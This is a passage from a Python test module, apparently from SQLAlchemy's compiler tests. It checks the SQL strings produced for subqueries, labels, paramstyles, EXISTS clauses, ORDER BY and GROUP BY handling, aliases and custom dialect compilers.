checkparams=params, ) def test_select_precol_compile_ordering(self): s1 = select([column("x")]).select_from(text("a")).limit(5).as_scalar() s2 = select([s1]).limit(10) class MyCompiler(compiler.SQLCompiler): def get_select_precolumns(self, select, **kw): result = "" if select._limit: result += "FIRST %s " % self.process( literal(select._limit), **kw ) if select._offset: result += "SKIP %s " % self.process( literal(select._offset), **kw ) return result def limit_clause(self, select, **kw): return "" dialect = default.DefaultDialect() dialect.statement_compiler = MyCompiler dialect.paramstyle = "qmark" dialect.positional = True self.assert_compile( s2, "SELECT FIRST ? (SELECT FIRST ? x FROM a) AS anon_1", checkpositional=(10, 5), dialect=dialect, ) def test_from_subquery(self): """tests placing select statements in the column clause of another select, for the purposes of selecting from the exported columns of that select.""" s = select([table1], table1.c.name == "jack") self.assert_compile( select([s], s.c.myid == 7), "SELECT myid, name, description FROM " "(SELECT mytable.myid AS myid, " "mytable.name AS name, mytable.description AS description " "FROM mytable " "WHERE mytable.name = :name_1) WHERE myid = :myid_1", ) sq = select([table1]) self.assert_compile( sq.select(), "SELECT myid, name, description FROM " "(SELECT mytable.myid AS myid, " "mytable.name AS name, mytable.description " "AS description FROM mytable)", ) sq = select([table1]).alias("sq") self.assert_compile( sq.select(sq.c.myid == 7), "SELECT sq.myid, sq.name, sq.description FROM " "(SELECT mytable.myid AS myid, mytable.name AS name, " "mytable.description AS description FROM mytable) AS sq " "WHERE sq.myid = :myid_1", ) sq = select( [table1, table2], and_(table1.c.myid == 7, table2.c.otherid == table1.c.myid), use_labels=True, ).alias("sq") sqstring = ( "SELECT mytable.myid AS mytable_myid, mytable.name AS " "mytable_name, mytable.description AS mytable_description, " "myothertable.otherid AS myothertable_otherid, " "myothertable.othername AS myothertable_othername FROM " "mytable, myothertable WHERE mytable.myid = :myid_1 AND " "myothertable.otherid = mytable.myid" ) self.assert_compile( sq.select(), "SELECT sq.mytable_myid, sq.mytable_name, " "sq.mytable_description, sq.myothertable_otherid, " "sq.myothertable_othername FROM (%s) AS sq" % sqstring, ) sq2 = select([sq], use_labels=True).alias("sq2") self.assert_compile( sq2.select(), "SELECT sq2.sq_mytable_myid, sq2.sq_mytable_name, " "sq2.sq_mytable_description, sq2.sq_myothertable_otherid, " "sq2.sq_myothertable_othername FROM " "(SELECT sq.mytable_myid AS " "sq_mytable_myid, sq.mytable_name AS sq_mytable_name, " "sq.mytable_description AS sq_mytable_description, " "sq.myothertable_otherid AS sq_myothertable_otherid, " "sq.myothertable_othername AS sq_myothertable_othername " "FROM (%s) AS sq) AS sq2" % sqstring, ) def test_select_from_clauselist(self): self.assert_compile( select([ClauseList(column("a"), column("b"))]).select_from( text("sometable") ), "SELECT a, b FROM sometable", ) def test_use_labels(self): self.assert_compile( select([table1.c.myid == 5], use_labels=True), "SELECT mytable.myid = :myid_1 AS anon_1 FROM mytable", ) self.assert_compile( select([func.foo()], use_labels=True), "SELECT foo() AS foo_1" ) # this is native_boolean=False for default dialect self.assert_compile( select([not_(True)], use_labels=True), "SELECT :param_1 = 0 AS anon_1", ) self.assert_compile( select([cast("data", Integer)], use_labels=True), "SELECT CAST(:param_1 AS INTEGER) AS anon_1", ) self.assert_compile( select( [func.sum(func.lala(table1.c.myid).label("foo")).label("bar")] ), "SELECT sum(lala(mytable.myid)) AS bar FROM mytable", ) self.assert_compile( select([keyed]), "SELECT keyed.x, keyed.y" ", keyed.z FROM keyed" ) self.assert_compile( select([keyed]).apply_labels(), "SELECT keyed.x AS keyed_x, keyed.y AS " "keyed_y, keyed.z AS keyed_z FROM keyed", ) def test_paramstyles(self): stmt = text("select :foo, :bar, :bat from sometable") self.assert_compile( stmt, "select ?, ?, ? from sometable", dialect=default.DefaultDialect(paramstyle="qmark"), ) self.assert_compile( stmt, "select :foo, :bar, :bat from sometable", dialect=default.DefaultDialect(paramstyle="named"), ) self.assert_compile( stmt, "select %s, %s, %s from sometable", dialect=default.DefaultDialect(paramstyle="format"), ) self.assert_compile( stmt, "select :1, :2, :3 from sometable", dialect=default.DefaultDialect(paramstyle="numeric"), ) self.assert_compile( stmt, "select %(foo)s, %(bar)s, %(bat)s from sometable", dialect=default.DefaultDialect(paramstyle="pyformat"), ) def test_anon_param_name_on_keys(self): self.assert_compile( keyed.insert(), "INSERT INTO keyed (x, y, z) VALUES (%(colx)s, %(coly)s, %(z)s)", dialect=default.DefaultDialect(paramstyle="pyformat"), ) self.assert_compile( keyed.c.coly == 5, "keyed.y = %(coly_1)s", checkparams={"coly_1": 5}, dialect=default.DefaultDialect(paramstyle="pyformat"), ) def test_dupe_columns(self): """test that deduping is performed against clause element identity, not rendered result.""" self.assert_compile( select([column("a"), column("a"), column("a")]), "SELECT a, a, a", dialect=default.DefaultDialect(), ) c = column("a") self.assert_compile( select([c, c, c]), "SELECT a", dialect=default.DefaultDialect() ) a, b = column("a"), column("b") self.assert_compile( select([a, b, b, b, a, a]), "SELECT a, b", dialect=default.DefaultDialect(), ) # using alternate keys. a, b, c = ( Column("a", Integer, key="b"), Column("b", Integer), Column("c", Integer, key="a"), ) self.assert_compile( select([a, b, c, a, b, c]), "SELECT a, b, c", dialect=default.DefaultDialect(), ) self.assert_compile( select([bindparam("a"), bindparam("b"), bindparam("c")]), "SELECT :a AS anon_1, :b AS anon_2, :c AS anon_3", dialect=default.DefaultDialect(paramstyle="named"), ) self.assert_compile( select([bindparam("a"), bindparam("b"), bindparam("c")]), "SELECT ? AS anon_1, ? AS anon_2, ? AS anon_3", dialect=default.DefaultDialect(paramstyle="qmark"), ) self.assert_compile( select([column("a"), column("a"), column("a")]), "SELECT a, a, a" ) s = select([bindparam("a"), bindparam("b"), bindparam("c")]) s = s.compile(dialect=default.DefaultDialect(paramstyle="qmark")) eq_(s.positiontup, ["a", "b", "c"]) def test_nested_label_targeting(self): """test nested anonymous label generation. """ s1 = table1.select() s2 = s1.alias() s3 = select([s2], use_labels=True) s4 = s3.alias() s5 = select([s4], use_labels=True) self.assert_compile( s5, "SELECT anon_1.anon_2_myid AS " "anon_1_anon_2_myid, anon_1.anon_2_name AS " "anon_1_anon_2_name, anon_1.anon_2_descript" "ion AS anon_1_anon_2_description FROM " "(SELECT anon_2.myid AS anon_2_myid, " "anon_2.name AS anon_2_name, " "anon_2.description AS anon_2_description " "FROM (SELECT mytable.myid AS myid, " "mytable.name AS name, mytable.description " "AS description FROM mytable) AS anon_2) " "AS anon_1", ) def test_nested_label_targeting_keyed(self): s1 = keyed.select() s2 = s1.alias() s3 = select([s2], use_labels=True) self.assert_compile( s3, "SELECT anon_1.x AS anon_1_x, " "anon_1.y AS anon_1_y, " "anon_1.z AS anon_1_z FROM " "(SELECT keyed.x AS x, keyed.y " "AS y, keyed.z AS z FROM keyed) AS anon_1", ) s4 = s3.alias() s5 = select([s4], use_labels=True) self.assert_compile( s5, "SELECT anon_1.anon_2_x AS anon_1_anon_2_x, " "anon_1.anon_2_y AS anon_1_anon_2_y, " "anon_1.anon_2_z AS anon_1_anon_2_z " "FROM (SELECT anon_2.x AS anon_2_x, " "anon_2.y AS anon_2_y, " "anon_2.z AS anon_2_z FROM " "(SELECT keyed.x AS x, keyed.y AS y, keyed.z " "AS z FROM keyed) AS anon_2) AS anon_1", ) def test_exists(self): s = select([table1.c.myid]).where(table1.c.myid == 5) self.assert_compile( exists(s), "EXISTS (SELECT mytable.myid FROM mytable " "WHERE mytable.myid = :myid_1)", ) self.assert_compile( exists(s.as_scalar()), "EXISTS (SELECT mytable.myid FROM mytable " "WHERE mytable.myid = :myid_1)", ) self.assert_compile( exists([table1.c.myid], table1.c.myid == 5).select(), "SELECT EXISTS (SELECT mytable.myid FROM " "mytable WHERE mytable.myid = :myid_1) AS anon_1", params={"mytable_myid": 5}, ) self.assert_compile( select([table1, exists([1], from_obj=table2)]), "SELECT mytable.myid, mytable.name, " "mytable.description, EXISTS (SELECT 1 " "FROM myothertable) AS anon_1 FROM mytable", params={}, ) self.assert_compile( select([table1, exists([1], from_obj=table2).label("foo")]), "SELECT mytable.myid, mytable.name, " "mytable.description, EXISTS (SELECT 1 " "FROM myothertable) AS foo FROM mytable", params={}, ) self.assert_compile( table1.select( exists() .where(table2.c.otherid == table1.c.myid) .correlate(table1) ), "SELECT mytable.myid, mytable.name, " "mytable.description FROM mytable WHERE " "EXISTS (SELECT * FROM myothertable WHERE " "myothertable.otherid = mytable.myid)", ) self.assert_compile( table1.select( exists() .where(table2.c.otherid == table1.c.myid) .correlate(table1) ), "SELECT mytable.myid, mytable.name, " "mytable.description FROM mytable WHERE " "EXISTS (SELECT * FROM myothertable WHERE " "myothertable.otherid = mytable.myid)", ) self.assert_compile( table1.select( exists() .where(table2.c.otherid == table1.c.myid) .correlate(table1) ).replace_selectable(table2, table2.alias()), "SELECT mytable.myid, mytable.name, " "mytable.description FROM mytable WHERE " "EXISTS (SELECT * FROM myothertable AS " "myothertable_1 WHERE myothertable_1.otheri" "d = mytable.myid)", ) self.assert_compile( table1.select( exists() .where(table2.c.otherid == table1.c.myid) .correlate(table1) ) .select_from( table1.join(table2, table1.c.myid == table2.c.otherid) ) .replace_selectable(table2, table2.alias()), "SELECT mytable.myid, mytable.name, " "mytable.description FROM mytable JOIN " "myothertable AS myothertable_1 ON " "mytable.myid = myothertable_1.otherid " "WHERE EXISTS (SELECT * FROM myothertable " "AS myothertable_1 WHERE " "myothertable_1.otherid = mytable.myid)", ) self.assert_compile( select( [ or_( exists().where(table2.c.otherid == "foo"), exists().where(table2.c.otherid == "bar"), ) ] ), "SELECT (EXISTS (SELECT * FROM myothertable " "WHERE myothertable.otherid = :otherid_1)) " "OR (EXISTS (SELECT * FROM myothertable WHERE " "myothertable.otherid = :otherid_2)) AS anon_1", ) self.assert_compile( select([exists([1])]), "SELECT EXISTS (SELECT 1) AS anon_1" ) self.assert_compile( select([~exists([1])]), "SELECT NOT (EXISTS (SELECT 1)) AS anon_1" ) self.assert_compile( select([~(~exists([1]))]), "SELECT NOT (NOT (EXISTS (SELECT 1))) AS anon_1", ) def test_where_subquery(self): s = select( [addresses.c.street], addresses.c.user_id == users.c.user_id, correlate=True, ).alias("s") # don't correlate in a FROM list self.assert_compile( select([users, s.c.street], from_obj=s), "SELECT users.user_id, users.user_name, " "users.password, s.street FROM users, " "(SELECT addresses.street AS street FROM " "addresses, users WHERE addresses.user_id = " "users.user_id) AS s", ) self.assert_compile( table1.select( table1.c.myid == select([table1.c.myid], table1.c.name == "jack") ), "SELECT mytable.myid, mytable.name, " "mytable.description FROM mytable WHERE " "mytable.myid = (SELECT mytable.myid FROM " "mytable WHERE mytable.name = :name_1)", ) self.assert_compile( table1.select( table1.c.myid == select( [table2.c.otherid], table1.c.name == table2.c.othername ) ), "SELECT mytable.myid, mytable.name, " "mytable.description FROM mytable WHERE " "mytable.myid = (SELECT " "myothertable.otherid FROM myothertable " "WHERE mytable.name = myothertable.othernam" "e)", ) self.assert_compile( table1.select(exists([1], table2.c.otherid == table1.c.myid)), "SELECT mytable.myid, mytable.name, " "mytable.description FROM mytable WHERE " "EXISTS (SELECT 1 FROM myothertable WHERE " "myothertable.otherid = mytable.myid)", ) talias = table1.alias("ta") s = subquery( "sq2", [talias], exists([1], table2.c.otherid == talias.c.myid) ) self.assert_compile( select([s, table1]), "SELECT sq2.myid, sq2.name, " "sq2.description, mytable.myid, " "mytable.name, mytable.description FROM " "(SELECT ta.myid AS myid, ta.name AS name, " "ta.description AS description FROM " "mytable AS ta WHERE EXISTS (SELECT 1 FROM " "myothertable WHERE myothertable.otherid = " "ta.myid)) AS sq2, mytable", ) # test constructing the outer query via append_column(), which # occurs in the ORM's Query object s = select( [], exists([1], table2.c.otherid == table1.c.myid), from_obj=table1 ) s.append_column(table1) self.assert_compile( s, "SELECT mytable.myid, mytable.name, " "mytable.description FROM mytable WHERE " "EXISTS (SELECT 1 FROM myothertable WHERE " "myothertable.otherid = mytable.myid)", ) def test_orderby_subquery(self): self.assert_compile( table1.select( order_by=[ select( [table2.c.otherid], table1.c.myid == table2.c.otherid ) ] ), "SELECT mytable.myid, mytable.name, " "mytable.description FROM mytable ORDER BY " "(SELECT myothertable.otherid FROM " "myothertable WHERE mytable.myid = " "myothertable.otherid)", ) self.assert_compile( table1.select( order_by=[ desc( select( [table2.c.otherid], table1.c.myid == table2.c.otherid, ) ) ] ), "SELECT mytable.myid, mytable.name, " "mytable.description FROM mytable ORDER BY " "(SELECT myothertable.otherid FROM " "myothertable WHERE mytable.myid = " "myothertable.otherid) DESC", ) def test_scalar_select(self): assert_raises_message( exc.InvalidRequestError, r"Select objects don't have a type\. Call as_scalar\(\) " r"on this Select object to return a 'scalar' " r"version of this Select\.", func.coalesce, select([table1.c.myid]), ) s = select([table1.c.myid], correlate=False).as_scalar() self.assert_compile( select([table1, s]), "SELECT mytable.myid, mytable.name, " "mytable.description, (SELECT mytable.myid " "FROM mytable) AS anon_1 FROM mytable", ) s = select([table1.c.myid]).as_scalar() self.assert_compile( select([table2, s]), "SELECT myothertable.otherid, " "myothertable.othername, (SELECT " "mytable.myid FROM mytable) AS anon_1 FROM " "myothertable", ) s = select([table1.c.myid]).correlate(None).as_scalar() self.assert_compile( select([table1, s]), "SELECT mytable.myid, mytable.name, " "mytable.description, (SELECT mytable.myid " "FROM mytable) AS anon_1 FROM mytable", ) s = select([table1.c.myid]).as_scalar() s2 = s.where(table1.c.myid == 5) self.assert_compile( s2, "(SELECT mytable.myid FROM mytable WHERE mytable.myid = :myid_1)", ) self.assert_compile(s, "(SELECT mytable.myid FROM mytable)") # test that aliases use as_scalar() when used in an explicitly # scalar context s = select([table1.c.myid]).alias() self.assert_compile( select([table1.c.myid]).where(table1.c.myid == s), "SELECT mytable.myid FROM mytable WHERE " "mytable.myid = (SELECT mytable.myid FROM " "mytable)", ) self.assert_compile( select([table1.c.myid]).where(s > table1.c.myid), "SELECT mytable.myid FROM mytable WHERE " "mytable.myid < (SELECT mytable.myid FROM " "mytable)", ) s = select([table1.c.myid]).as_scalar() self.assert_compile( select([table2, s]), "SELECT myothertable.otherid, " "myothertable.othername, (SELECT " "mytable.myid FROM mytable) AS anon_1 FROM " "myothertable", ) # test expressions against scalar selects self.assert_compile( select([s - literal(8)]), "SELECT (SELECT mytable.myid FROM mytable) " "- :param_1 AS anon_1", ) self.assert_compile( select([select([table1.c.name]).as_scalar() + literal("x")]), "SELECT (SELECT mytable.name FROM mytable) " "|| :param_1 AS anon_1", ) self.assert_compile( select([s > literal(8)]), "SELECT (SELECT mytable.myid FROM mytable) " "> :param_1 AS anon_1", ) self.assert_compile( select([select([table1.c.name]).label("foo")]), "SELECT (SELECT mytable.name FROM mytable) " "AS foo", ) # scalar selects should not have any attributes on their 'c' or # 'columns' attribute s = select([table1.c.myid]).as_scalar() try: s.c.foo except exc.InvalidRequestError as err: assert ( str(err) == "Scalar Select expression has no columns; use this " "object directly within a column-level expression." ) try: s.columns.foo except exc.InvalidRequestError as err: assert ( str(err) == "Scalar Select expression has no columns; use this " "object directly within a column-level expression." ) zips = table( "zips", column("zipcode"), column("latitude"), column("longitude") ) places = table("places", column("id"), column("nm")) zipcode = "12345" qlat = ( select([zips.c.latitude], zips.c.zipcode == zipcode) .correlate(None) .as_scalar() ) qlng = ( select([zips.c.longitude], zips.c.zipcode == zipcode) .correlate(None) .as_scalar() ) q = select( [ places.c.id, places.c.nm, zips.c.zipcode, func.latlondist(qlat, qlng).label("dist"), ], zips.c.zipcode == zipcode, order_by=["dist", places.c.nm], ) self.assert_compile( q, "SELECT places.id, places.nm, " "zips.zipcode, latlondist((SELECT " "zips.latitude FROM zips WHERE " "zips.zipcode = :zipcode_1), (SELECT " "zips.longitude FROM zips WHERE " "zips.zipcode = :zipcode_2)) AS dist FROM " "places, zips WHERE zips.zipcode = " ":zipcode_3 ORDER BY dist, places.nm", ) zalias = zips.alias("main_zip") qlat = select( [zips.c.latitude], zips.c.zipcode == zalias.c.zipcode ).as_scalar() qlng = select( [zips.c.longitude], zips.c.zipcode == zalias.c.zipcode ).as_scalar() q = select( [ places.c.id, places.c.nm, zalias.c.zipcode, func.latlondist(qlat, qlng).label("dist"), ], order_by=["dist", places.c.nm], ) self.assert_compile( q, "SELECT places.id, places.nm, " "main_zip.zipcode, latlondist((SELECT " "zips.latitude FROM zips WHERE " "zips.zipcode = main_zip.zipcode), (SELECT " "zips.longitude FROM zips WHERE " "zips.zipcode = main_zip.zipcode)) AS dist " "FROM places, zips AS main_zip ORDER BY " "dist, places.nm", ) a1 = table2.alias("t2alias") s1 = select([a1.c.otherid], table1.c.myid == a1.c.otherid).as_scalar() j1 = table1.join(table2, table1.c.myid == table2.c.otherid) s2 = select([table1, s1], from_obj=j1) self.assert_compile( s2, "SELECT mytable.myid, mytable.name, " "mytable.description, (SELECT " "t2alias.otherid FROM myothertable AS " "t2alias WHERE mytable.myid = " "t2alias.otherid) AS anon_1 FROM mytable " "JOIN myothertable ON mytable.myid = " "myothertable.otherid", ) def test_label_comparison_one(self): x = func.lala(table1.c.myid).label("foo") self.assert_compile( select([x], x == 5), "SELECT lala(mytable.myid) AS foo FROM " "mytable WHERE lala(mytable.myid) = " ":param_1", ) def test_label_comparison_two(self): self.assert_compile( label("bar", column("foo", type_=String)) + "foo", "foo || :param_1", ) def test_order_by_labels_enabled(self): lab1 = (table1.c.myid + 12).label("foo") lab2 = func.somefunc(table1.c.name).label("bar") dialect = default.DefaultDialect() self.assert_compile( select([lab1, lab2]).order_by(lab1, desc(lab2)), "SELECT mytable.myid + :myid_1 AS foo, " "somefunc(mytable.name) AS bar FROM mytable " "ORDER BY foo, bar DESC", dialect=dialect, ) # the function embedded label renders as the function self.assert_compile( select([lab1, lab2]).order_by(func.hoho(lab1), desc(lab2)), "SELECT mytable.myid + :myid_1 AS foo, " "somefunc(mytable.name) AS bar FROM mytable " "ORDER BY hoho(mytable.myid + :myid_1), bar DESC", dialect=dialect, ) # binary expressions render as the expression without labels self.assert_compile( select([lab1, lab2]).order_by(lab1 + "test"), "SELECT mytable.myid + :myid_1 AS foo, " "somefunc(mytable.name) AS bar FROM mytable " "ORDER BY mytable.myid + :myid_1 + :param_1", dialect=dialect, ) # labels within functions in the columns clause render # with the expression self.assert_compile( select([lab1, func.foo(lab1)]).order_by(lab1, func.foo(lab1)), "SELECT mytable.myid + :myid_1 AS foo, " "foo(mytable.myid + :myid_1) AS foo_1 FROM mytable " "ORDER BY foo, foo(mytable.myid + :myid_1)", dialect=dialect, ) lx = (table1.c.myid + table1.c.myid).label("lx") ly = (func.lower(table1.c.name) + table1.c.description).label("ly") self.assert_compile( select([lx, ly]).order_by(lx, ly.desc()), "SELECT mytable.myid + mytable.myid AS lx, " "lower(mytable.name) || mytable.description AS ly " "FROM mytable ORDER BY lx, ly DESC", dialect=dialect, ) # expression isn't actually the same thing (even though label is) self.assert_compile( select([lab1, lab2]).order_by( table1.c.myid.label("foo"), desc(table1.c.name.label("bar")) ), "SELECT mytable.myid + :myid_1 AS foo, " "somefunc(mytable.name) AS bar FROM mytable " "ORDER BY mytable.myid, mytable.name DESC", dialect=dialect, ) # it's also an exact match, not aliased etc. self.assert_compile( select([lab1, lab2]).order_by( desc(table1.alias().c.name.label("bar")) ), "SELECT mytable.myid + :myid_1 AS foo, " "somefunc(mytable.name) AS bar FROM mytable " "ORDER BY mytable_1.name DESC", dialect=dialect, ) # but! it's based on lineage lab2_lineage = lab2.element._clone() self.assert_compile( select([lab1, lab2]).order_by(desc(lab2_lineage.label("bar"))), "SELECT mytable.myid + :myid_1 AS foo, " "somefunc(mytable.name) AS bar FROM mytable " "ORDER BY bar DESC", dialect=dialect, ) # here, 'name' is implicitly available, but w/ #3882 we don't # want to render a name that isn't specifically a Label elsewhere # in the query self.assert_compile( select([table1.c.myid]).order_by(table1.c.name.label("name")), "SELECT mytable.myid FROM mytable ORDER BY mytable.name", ) # as well as if it doesn't match self.assert_compile( select([table1.c.myid]).order_by( func.lower(table1.c.name).label("name") ), "SELECT mytable.myid FROM mytable ORDER BY lower(mytable.name)", ) def test_order_by_labels_disabled(self): lab1 = (table1.c.myid + 12).label("foo") lab2 = func.somefunc(table1.c.name).label("bar") dialect = default.DefaultDialect() dialect.supports_simple_order_by_label = False self.assert_compile( select([lab1, lab2]).order_by(lab1, desc(lab2)), "SELECT mytable.myid + :myid_1 AS foo, " "somefunc(mytable.name) AS bar FROM mytable " "ORDER BY mytable.myid + :myid_1, somefunc(mytable.name) DESC", dialect=dialect, ) self.assert_compile( select([lab1, lab2]).order_by(func.hoho(lab1), desc(lab2)), "SELECT mytable.myid + :myid_1 AS foo, " "somefunc(mytable.name) AS bar FROM mytable " "ORDER BY hoho(mytable.myid + :myid_1), " "somefunc(mytable.name) DESC", dialect=dialect, ) def test_no_group_by_labels(self): lab1 = (table1.c.myid + 12).label("foo") lab2 = func.somefunc(table1.c.name).label("bar") dialect = default.DefaultDialect() self.assert_compile( select([lab1, lab2]).group_by(lab1, lab2), "SELECT mytable.myid + :myid_1 AS foo, somefunc(mytable.name) " "AS bar FROM mytable GROUP BY mytable.myid + :myid_1, " "somefunc(mytable.name)", dialect=dialect, ) def test_conjunctions(self): a, b, c = text("a"), text("b"), text("c") x = and_(a, b, c) assert isinstance(x.type, Boolean) assert str(x) == "a AND b AND c" self.assert_compile( select([x.label("foo")]), "SELECT a AND b AND c AS foo" ) self.assert_compile( and_( table1.c.myid == 12, table1.c.name == "asdf", table2.c.othername == "foo", text("sysdate() = today()"), ), "mytable.myid = :myid_1 AND mytable.name = :name_1 " "AND myothertable.othername = " ":othername_1 AND sysdate() = today()", ) self.assert_compile( and_( table1.c.myid == 12, or_( table2.c.othername == "asdf", table2.c.othername == "foo", table2.c.otherid == 9, ), text("sysdate() = today()"), ), "mytable.myid = :myid_1 AND (myothertable.othername = " ":othername_1 OR myothertable.othername = :othername_2 OR " "myothertable.otherid = :otherid_1) AND sysdate() = " "today()", checkparams={ "othername_1": "asdf", "othername_2": "foo", "otherid_1": 9, "myid_1": 12, }, ) # test a generator self.assert_compile( and_( conj for conj in [table1.c.myid == 12, table1.c.name == "asdf"] ), "mytable.myid = :myid_1 AND mytable.name = :name_1", ) def test_nested_conjunctions_short_circuit(self): """test that empty or_(), and_() conjunctions are collapsed by an enclosing conjunction.""" t = table("t", column("x")) self.assert_compile( select([t]).where(and_(t.c.x == 5, or_(and_(or_(t.c.x == 7))))), "SELECT t.x FROM t WHERE t.x = :x_1 AND t.x = :x_2", ) self.assert_compile( select([t]).where(and_(or_(t.c.x == 12, and_(or_(t.c.x == 8))))), "SELECT t.x FROM t WHERE t.x = :x_1 OR t.x = :x_2", ) self.assert_compile( select([t]).where( and_( or_( or_(t.c.x == 12), and_(or_(), or_(and_(t.c.x == 8)), and_()), ) ) ), "SELECT t.x FROM t WHERE t.x = :x_1 OR t.x = :x_2", ) def test_true_short_circuit(self): t = table("t", column("x")) self.assert_compile( select([t]).where(true()), "SELECT t.x FROM t WHERE 1 = 1", dialect=default.DefaultDialect(supports_native_boolean=False), ) self.assert_compile( select([t]).where(true()), "SELECT t.x FROM t WHERE true", dialect=default.DefaultDialect(supports_native_boolean=True), ) self.assert_compile( select([t]), "SELECT t.x FROM t", dialect=default.DefaultDialect(supports_native_boolean=True), ) def test_distinct(self): self.assert_compile( select([table1.c.myid.distinct()]), "SELECT DISTINCT mytable.myid FROM mytable", ) self.assert_compile( select([distinct(table1.c.myid)]), "SELECT DISTINCT mytable.myid FROM mytable", ) self.assert_compile( select([table1.c.myid]).distinct(), "SELECT DISTINCT mytable.myid FROM mytable", ) self.assert_compile( select([func.count(table1.c.myid.distinct())]), "SELECT count(DISTINCT mytable.myid) AS count_1 FROM mytable", ) self.assert_compile( select([func.count(distinct(table1.c.myid))]), "SELECT count(DISTINCT mytable.myid) AS count_1 FROM mytable", ) def test_where_empty(self): self.assert_compile( select([table1.c.myid]).where(and_()), "SELECT mytable.myid FROM mytable", ) self.assert_compile( select([table1.c.myid]).where(or_()), "SELECT mytable.myid FROM mytable", ) def test_order_by_nulls(self): self.assert_compile( table2.select( order_by=[ table2.c.otherid, table2.c.othername.desc().nullsfirst(), ] ), "SELECT myothertable.otherid, myothertable.othername FROM " "myothertable ORDER BY myothertable.otherid, " "myothertable.othername DESC NULLS FIRST", ) self.assert_compile( table2.select( order_by=[ table2.c.otherid, table2.c.othername.desc().nullslast(), ] ), "SELECT myothertable.otherid, myothertable.othername FROM " "myothertable ORDER BY myothertable.otherid, " "myothertable.othername DESC NULLS LAST", ) self.assert_compile( table2.select( order_by=[ table2.c.otherid.nullslast(), table2.c.othername.desc().nullsfirst(), ] ), "SELECT myothertable.otherid, myothertable.othername FROM " "myothertable ORDER BY myothertable.otherid NULLS LAST, " "myothertable.othername DESC NULLS FIRST", ) self.assert_compile( table2.select( order_by=[ table2.c.otherid.nullsfirst(), table2.c.othername.desc(), ] ), "SELECT myothertable.otherid, myothertable.othername FROM " "myothertable ORDER BY myothertable.otherid NULLS FIRST, " "myothertable.othername DESC", ) self.assert_compile( table2.select( order_by=[ table2.c.otherid.nullsfirst(), table2.c.othername.desc().nullslast(), ] ), "SELECT myothertable.otherid, myothertable.othername FROM " "myothertable ORDER BY myothertable.otherid NULLS FIRST, " "myothertable.othername DESC NULLS LAST", ) def test_orderby_groupby(self): self.assert_compile( table2.select( order_by=[table2.c.otherid, asc(table2.c.othername)] ), "SELECT myothertable.otherid, myothertable.othername FROM " "myothertable ORDER BY myothertable.otherid, " "myothertable.othername ASC", ) self.assert_compile( table2.select( order_by=[table2.c.otherid, table2.c.othername.desc()] ), "SELECT myothertable.otherid, myothertable.othername FROM " "myothertable ORDER BY myothertable.otherid, " "myothertable.othername DESC", ) # generative order_by self.assert_compile( table2.select() .order_by(table2.c.otherid) .order_by(table2.c.othername.desc()), "SELECT myothertable.otherid, myothertable.othername FROM " "myothertable ORDER BY myothertable.otherid, " "myothertable.othername DESC", ) self.assert_compile( table2.select() .order_by(table2.c.otherid) .order_by(table2.c.othername.desc()) .order_by(None), "SELECT myothertable.otherid, myothertable.othername " "FROM myothertable", ) self.assert_compile( select( [table2.c.othername, func.count(table2.c.otherid)], group_by=[table2.c.othername], ), "SELECT myothertable.othername, " "count(myothertable.otherid) AS count_1 " "FROM myothertable GROUP BY myothertable.othername", ) # generative group by self.assert_compile( select( [table2.c.othername, func.count(table2.c.otherid)] ).group_by(table2.c.othername), "SELECT myothertable.othername, " "count(myothertable.otherid) AS count_1 " "FROM myothertable GROUP BY myothertable.othername", ) self.assert_compile( select([table2.c.othername, func.count(table2.c.otherid)]) .group_by(table2.c.othername) .group_by(None), "SELECT myothertable.othername, " "count(myothertable.otherid) AS count_1 " "FROM myothertable", ) self.assert_compile( select( [table2.c.othername, func.count(table2.c.otherid)], group_by=[table2.c.othername], order_by=[table2.c.othername], ), "SELECT myothertable.othername, " "count(myothertable.otherid) AS count_1 " "FROM myothertable " "GROUP BY myothertable.othername ORDER BY myothertable.othername", ) def test_custom_order_by_clause(self): class CustomCompiler(PGCompiler): def order_by_clause(self, select, **kw): return ( super(CustomCompiler, self).order_by_clause(select, **kw) + " CUSTOMIZED" ) class CustomDialect(PGDialect): name = "custom" statement_compiler = CustomCompiler stmt = select([table1.c.myid]).order_by(table1.c.myid) self.assert_compile( stmt, "SELECT mytable.myid FROM mytable ORDER BY " "mytable.myid CUSTOMIZED", dialect=CustomDialect(), ) def test_custom_group_by_clause(self): class CustomCompiler(PGCompiler): def group_by_clause(self, select, **kw): return ( super(CustomCompiler, self).group_by_clause(select, **kw) + " CUSTOMIZED" ) class CustomDialect(PGDialect): name = "custom" statement_compiler = CustomCompiler stmt = select([table1.c.myid]).group_by(table1.c.myid) self.assert_compile( stmt, "SELECT mytable.myid FROM mytable GROUP BY " "mytable.myid CUSTOMIZED", dialect=CustomDialect(), ) def test_for_update(self): self.assert_compile( table1.select(table1.c.myid == 7).with_for_update(), "SELECT mytable.myid, mytable.name, mytable.description " "FROM mytable WHERE mytable.myid = :myid_1 FOR UPDATE", ) # not supported by dialect, should just use update self.assert_compile( table1.select(table1.c.myid == 7).with_for_update(nowait=True), "SELECT mytable.myid, mytable.name, mytable.description " "FROM mytable WHERE mytable.myid = :myid_1 FOR UPDATE", ) def test_alias(self): # test the alias for a table1. column names stay the same, # table name "changes" to "foo". self.assert_compile( select([table1.alias("foo")]), "SELECT foo.myid, foo.name, foo.description FROM mytable AS foo", ) for dialect in (oracle.dialect(),): self.assert_compile( select([table1.alias("foo")]), "SELECT foo.myid, foo.name, foo.description FROM mytable foo", dialect=dialect, ) self.assert_compile( select([table1.alias()]), "SELECT mytable_1.myid, mytable_1.name, mytable_1.description " "FROM mytable AS mytable_1", ) # create a select for a join of two tables. use_labels # means the column names will have labels tablename_columnname, # which become the column keys accessible off the Selectable object. # also, only use one column from the second table and all columns # from the first table1. q = select( [table1, table2.c.otherid], table1.c.myid == table2.c.otherid, use_labels=True, ) # make an alias of the "selectable". column names # stay the same (i.e. the labels), table name "changes" to "t2view". a = alias(q, "t2view") # select from that alias, also using labels. two levels of labels # should produce two underscores. # also, reference the column "mytable_myid" off of the t2view alias. self.assert_compile( a.select(a.c.mytable_myid == 9, use_labels=True), "SELECT t2view.mytable_myid AS t2view_mytable_myid, " "t2view.mytable_name " "AS t2view_mytable_name, " "t2view.mytable_description AS t2view_mytable_description, " "t2view.myothertable_otherid AS t2view_myothertable_otherid FROM " "(SELECT mytable.myid AS mytable_myid, " "mytable.name AS mytable_name, " "mytable.description AS mytable_description, " "myothertable.otherid AS " "myothertable_otherid FROM mytable, myothertable " "WHERE mytable.myid = " "myothertable.otherid) AS t2view " "WHERE t2view.mytable_myid = :mytable_myid_1", ) def test_prefix(self): self.assert_compile( table1.select() .prefix_with("SQL_CALC_FOUND_ROWS") 